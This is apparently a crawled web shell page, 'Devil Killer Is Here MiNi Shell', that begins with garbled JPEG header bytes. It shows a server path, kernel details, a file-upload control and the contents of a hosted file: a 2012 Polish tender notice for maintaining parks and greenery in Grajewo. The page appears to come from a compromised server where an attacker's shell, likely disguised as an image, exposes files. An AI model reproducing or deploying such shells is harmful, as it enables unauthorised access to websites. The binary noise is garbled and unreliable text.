JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120306/68780-N-2012.html

<p class="kh_header"><b>Grajewo: Pielęgnację zieleni miejskiej w mieście Grajewo w 2012 roku</b><br>
<b>Numer ogłoszenia: 68780 - 2012; data zamieszczenia: 06.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Grajewo , ul. Strażacka 6A, 19-200 Grajewo, woj. podlaskie, tel. 86 273 0 800, faks 86 273 0 803.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grajewo.pl; bip.um.grajewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pielęgnację zieleni miejskiej w mieście Grajewo w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie pielęgnacji zieleni miejskiej w mieście Grajewo w okresie od 16 kwietnia 2012 r. do 30 listopada 2012 r.
W ramach  pielęgnacji  i  bieżącego  utrzymania  terenów  zieleni  miejskiej  należy  objąć nadzorem wszystkie urządzone tereny i obiekty, w tym również stawy w parku Central.  
Szczegółowy zakres utrzymania zieleni miejskiej w 2012 roku obejmuje: 
1) konserwację i bieżące utrzymanie niżej wymienionych obiektów: 
a) parki położone na terenie miasta, w tym:
- park przy ul. Strażackiej                                                       -    18.525 m 2
- park przy ul. Nowickiego                                                       -    4.900 m 2 
- park przy Urzędzie Miasta                                                     -     5.340 m 2     
- park i plac zabaw oraz teren wokół budynku Grajewskiej Izby Historycznej
przy ul. Wojska Polskiego                                                         -   11.800 m 2 
b) park CENTRAL, w tym:
- pielęgnację i konserwację łąk i trawników                             -  ok. 40.000  m2 ,
- odchwaszczanie i oczyszczanie alejek żwirowych                  -   ok.  6.400  m2 ,
- pielęgnację drzew - utrzymanie tzw. czarnego ugoru w obrębie drzew, 
- utrzymanie czystości i porządku na terenie miasteczka ruchu drogowego - koszenie 
  trawy, zamiatanie alejek, wywożenie śmieci z koszy, remont ławek,
- letnie utrzymanie we właściwym stanie alejek parkowych (z wyłączeniem zimowego   utrzymania alejki głównej w parku Central - w okresie od 1 listopada do 30  
  kwietnia), 
- utrzymanie w czystości, odśnieżanie i usuwanie gołoledzi na 2 schodach 
  stanowiących zejścia do parku od ul. Konstytucji 3 Maja i os. Broniewskiego (przy  
  bloku Nr 8,11),
- konserwację stawów i rowów położonych na terenie parku, w tym:
* koszenie skarp rowów oraz dna rowów                      -  na bieżąco,
* koszenie skarp stawów                                          -  na bieżąco,
* usuwanie namułów z dna rowów                              -  w miarę potrzeby,
* oczyszczanie stawów i rowów z nieczystości stałych   - na bieżąco,
* usuwanie awarii drenarskich                                    -  w miarę potrzeby,
* odmulanie studzienek drenarskich                             -  w miarę potrzeby, 
* usuwanie rzęsy z lustra wody w stawach                  -  na bieżąco,	
* utrzymanie w należytym stanie zasuwy spustowej      -  na bieżąco,
* zbieranie i wywożenie na bieżąco nieczystości stałych z  terenu parku.
c) trawniki, skwery i zieleńce, w tym:
- skwer na Pl. Niepodległości                                      -     2.000 m2   
- trawniki przy ul. Krasickiego 4 (przychodnia)               -        680 m2
- trawniki przy ul. Grunwaldzkiej                                  -        669 m2 
- trawniki przy klubie Hades  i parking trawiasty             -     1.920 m2
- trawniki przy scenie estradowej przy klubie Hades        -     6.000 m2
- zieleniec przy ul. Dwornej  i Wilczewo                        -        836 m2
- trawniki na os. Południe przy bloku Nr 3                     -      1.500 m2
- zieleniec przy ul. Dwornej i Wesołej                           -        630 m2
- trawniki przy ul. Mickiewicza                                    -     1.400 m2
- trawniki przy ul. Konstytucji 3-go Maja  i Nowo Osiedle -        400 m2
- trawniki przy ul. Targowej                                       -        500 m2
- trawniki przy ul. 9 PSK                                           -     4.200 m2
- trawniki przy ul. Wojska Polskiego oraz na skarpach przy schodach MDK  
   wraz z krzewami i kwiatami                                    -     1.800 m2
- trawnik przy szalecie miejskim ul. Piłsudskiego            -        100 m2
- trawniki przy ul. Konstytucji 3 Maja pomiędzy ulicą a parkingiem TBS 
            - 2.200 m2                                                                                     
- zieleniec i trawniki przy ul. Pułaskiego                       -      3.600 m2
- skwer  przy ul. Nowo Osiedle                                  -           50 m2  
- skwer  przy ul. Popiełuszki                                      -           50 m2  
- skwer i trawniki  przy przedszkolu Nr 6 na os. Południe -         850 m2  
- trawniki przy ul. Szpitalnej                                      -      4.200 m2
- trawniki przy ul. Ekologicznej                                   -      2.500 m2  
- trawniki przy ul. Ks Pęzy                                         -      1.200 m2 
- trawniki przy ul. Konopnickiej, Łąkowej, Słonecznej, Kolejowej  -   1.800 m2
- trawniki przy ul. Dwornej                                         -      2.000 m2 
- skwer przy ul. Ełckiej  (na wys. os. Centrum)              -         200 m2
- trawnik na os. Broniewskiego (pomiędzy blokami Nr 1 i 3) -      100 m2
- trawniki przy ul. Nowickiego i skrzyżowaniu z ul. Kilińskiego i Traugutta - 450 m2
- trawniki przy ul. Kolejowej                                        -       200 m2
pozostałe miejskie tereny zieleni urządzonej, w tym m.in.:
- tereny rekreacyjne położone pomiędzy ul. Legionistów a torami PKP, 
na działce Nr 4603/1                                                    -     20.000 m2  
-  boisko przy ul. Ks. Pęzy                                             -      1.550 m2
-  boisko za parkingiem na Oś. Centrum                            -      3.000 m2       
-  plac przy garażach - ul. Strażacka 17                           -         360 m2
Zakres robót przy obiektach, wymienionych w punkcie 1, polega na:
a) utrzymaniu należytego stanu darni poprzez systematyczne koszenie, podlewanie 
i nawożenie,     
b) utrzymaniu czystości i porządku  poprzez wygrabianie trawników, zbieranie i wywóz nieczystości,
c) odsiewaniu trawy w miejscach wydeptanych                   -     ok. 200 m2     
d) obsadzaniu i pielęgnacji rabat kwiatowych na skwerkach i w gazonach 
ok. 800 m2,                  
prace polegają na wykonywaniu nasadzeń kwiatowych w ilości 9000 szt.                  w miesiącach: kwiecień - maj - pierwsze nasadzenie, czerwiec - lipiec - drugie nasadzenie oraz ich pielęgnacji w okresie wegetacji. Miasto Grajewo zabezpieczy sadzonki kwiatów.
Miejsca nasadzeń:  
- parki miejskie, skwer i trawniki na skrzyżowaniu dróg krajowych i przy Placu           Niepodległości,
-  teren przed Urzędem Miasta, przy ul. Mickiewicza, Nowickiego,
-  przy ul. Krasickiego - przed przychodnią lekarską,
-  zieleniec przed MDK (ul. Wojska Polskiego),
-  skwery przy ul. Koszarowej;                                                 
2) utrzymanie właściwej estetyki terenów nie urządzonych stanowiących mienie miejskie:
a) położonych pomiędzy Osiedlem Młodych, a ul. Kopernika na działkach nr 3963,    3964/5, 1611/2, 1618/2 (lasek) - utrzymanie polega na odchwaszczaniu terenu wokół 
drzewek, placu zabaw i w rejonie rowu,
b) położonych przy ul. Targowej naprzeciwko Szpitala  (pomiędzy ul. Konstytucji 3
Maja a budynkiem TBS na działce nr 1888/9 ) - utrzymanie polega na wykaszaniu   
trawy, chwastów i zbieraniu śmieci,
c) położonych na os. Centrum w sąsiedztwie parkingu za kościołem i bloków
mieszkalnych na działce nr 1061/11 - utrzymanie polega na wykaszaniu trawy
i chwastów oraz zbieraniu śmieci,
d) zieleni przydrożnej nieurządzonej w pasach dróg miejskich, w szczególności: przy ul. Konopnickiej, Łąkowej, Działkowej, Kolejowej, Wiktorowo, Ekologicznej (od ul. Kopernika do ul. Wiktorowo i od ul. Elektrycznej do ul. Topolowej), Elektrycznej, ul. 9-ego PSK, Robotniczej, Grunwaldzkiej, Dwornej, Wyzwolenia,                 Lipowej, Rzemieślniczej, Wiejskiej, Ks. Pęzy (do ogródków działkowych i
przepompowni ścieków), 23 - Stycznia, Wilczewo, Sienkiewicza, Wierzbowej,  
11-go Listopada, Sadowej, Rolnej, Bocznej, Partyzantów, Wąskiej, Braci Świackich,   Legionistów - utrzymanie polega na wykaszaniu chwastów i zbieraniu śmieci,
e) skarp na os. Broniewskiego i os. 1000 - lecia przy zjeździe do parku Central - 
utrzymanie polega na wykoszeniu i zbieraniu śmieci oraz  utrzymanie w czystości, 
f) położonych na os. Południe pomiędzy budynkami TBS a Zespołem Szkół
Zawodowych i garażami w ul. Ekologicznej na działkach nr 2046/7, 2046/8, 2056/3,
2056/5, 2056/6, 2055/9, 2055/13, 2055/14, 2055/15, 2054/10, 2054/11, 2054/12,     2054/13, 2053/14, 2053/16, 2053/18, 2053/20, 2052/4, 2052/4, 2052/13, 2052/15,  2052/17, 2052/19, 2051/7 - utrzymanie polega na wykaszaniu chwastów 
i zbieraniu śmieci,
g) terenów położonych pomiędzy zabudową jednorodzinną przy ul. Baczyńskiego,
Pracowniczymi Ogrodami Działkowymi im. H. Sawickiej, a przepompownią
ścieków i ul. Ks. Pęzy na działkach nr 853, 839, 855, 849 - utrzymanie polega na  wykaszaniu chwastów i zbieraniu śmieci,
3)  Utrzymanie drzew i krzewów rosnących przy ulicach będących drogami  miejskimi, 
polegające na dokonaniu cięć pielęgnacyjnych  drzew i  krzewów, usuwaniu odrostów
przy drzewach, utrzymaniu w obrębie drzew tzw. czarnego ugoru,                                      
4) Założenie trawników, m.in. przy ul. Kilińskiego, Nowickiego,   -   ok. 650 m 2
5) Pielęgnację żywopłotów znajdujących się:
a) przy Urzędzie Miasta                                                      -   500 mb.
b) w parku  przy ul. Wojska Polskiego                                        180
c) przy klubie Hades                                                               150
d) przy szalecie miejskim                                                           70
Pielęgnacja żywopłotów polega na podcinaniu i formowaniu na bieżąco, utrzymywaniu 
tzw. czarnego ugoru w pasie żywopłotu, podlewaniu i nawożeniu żywopłotów.  
6) Oczyszczenie i odchwaszczenie alejek wykonanych z płyt chodnikowych i polbruku 
oraz alejek żwirowych w parkach i na zieleńcach w okresie letnim, a w okresie 
zimowym - odśnieżanie i posypywanie piaskiem.   
Powierzchnia alejek:
a) skwer przy Pl. Niepodległości                                                -     660 m 2
b) park przy ul. Strażackiej                                                      -   2.950 m 2
c) park przy ul. Nowickiego                                                      -     460 m 2
d) park przy ul. Wojska Polskiego                                              -   2.880 m 2
e) skarpa przy cmentarzu komunalnym ul. Pułaskiego                    -     400 m 2
f)  park przy Urzędzie Miasta (z wyłączeniem placu i chodników przed budynkiem)   
                                                            - 800m2                                           
7) Renowację istniejących trawników, m.in.: w parkach, przy Urzędzie Miejskim,   
- ogółem ok. 500 m2  
8) Zawieszenie na słupach oświetleniowych 9 kpl. kwietników i nasadzenie w nich oraz pielęgnowanie kwiatów w ilości ok. 25 szt. na jeden kwietnik - kwietniki i żel dostarczy Zamawiający, kwiaty zakupi Wykonawca,
9)  Remont ławek parkowych, oznakowań i urządzeń w parkach miejskich.
Zakres prac obejmuje:
a) remont ławek w tym uzupełnienie brakujących listew siedzisk i oparć oraz naprawę wraz z pomalowaniem - w okresie do 30 maja,
b) remont tablic informacyjnych, 
c) remont urządzeń parkowych służących do zabawy i odpoczynku, w tym  naprawę wraz z pomalowaniem - w okresie do 30 maja.
10) Roboty zapewniające utrzymanie warunków bezpieczeństwa w ruchu drogowym, w tym:              
a) utrzymanie trójkątów widoczności na skrzyżowaniach dróg,  
b) wycinanie gałęzi i krzewów oraz koszenie trawy w pasach drogowych dróg     miejskich,
c) utrzymanie widoczności znaków drogowych przy ulicach miejskich.
11)  Dostarczenie i ustawienie  3 szt.  choinek:  na Placu Niepodległości i przed Urzędem Miasta..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5, 77.34.00.00-5, 77.31.21.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 16.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający będzie żądał wpłacenia wadium na następujących zasadach: 
Wadium - może być wniesione w: pieniądzu, poręczeniach oraz gwarancjach bankowych, gwarancjach ubezpieczeniowych, zastawach na papierach wartościowych emitowanych lub gwarantowanych przez Skarb Państwa. 
Wadium wniesione w pieniądzu Zamawiający będzie przechowywał na rachunku bankowym. 
Ustala się wysokość wadium na kwotę 5 000 zł (słownie: pięć tysięcy złotych).
Przelew gotówkowy za wadium należy wpłacić na konto nr:
90 8768 1013 1300 1951 2000 0010 w Banku Spółdzielczym w Szczuczynie, oddział Grajewo.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
1) określone przepisami art. 22 ust. 1 pkt 1-3 ustawy;
2) nie podlegają wykluczeniu z postępowania na podstawie przepisów art. 24 ust. 1 i 2 ustawy;
Zamawiający dokona oceny spełnienia tych warunków poprzez sprawdzenie kompletności (co do ilości i treści) dokumentów załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykaz sprzętu jakim dysponuje Wykonawca, a który jest niezbędny i przystosowany do właściwego wykonania przedmiotu zamówienia (zał. nr 2b). 
Wykonawca winien dysponować równocześnie:
- min. 3 kosiarkami samojezdnymi (traktorki) do koszenia trawy lub 6 kosiarkami   spalinowymi (przyjmując równoważnik 2 kosiarki za 1 kosiarkę samojezdną ),
- min. 1 zamiatarką mechaniczną dostosowaną do zamiatania chodników,
- min. 1 spalinową piłę mechaniczną do wycinki konarów drzew,
- min. 1 pojazdem bezpylnym do wywozu śmieci z koszy parkowych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.grajewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Grajewo
ul. Strażacka 6
19 - 200 Grajewo
(pokój nr 29).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2012 godzina 12:00, miejsce: Urząd Miasta Grajewo
ul. Strażacka 6A
19 - 200 Grajewo
(Sekretariat, pokój Nr 21).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com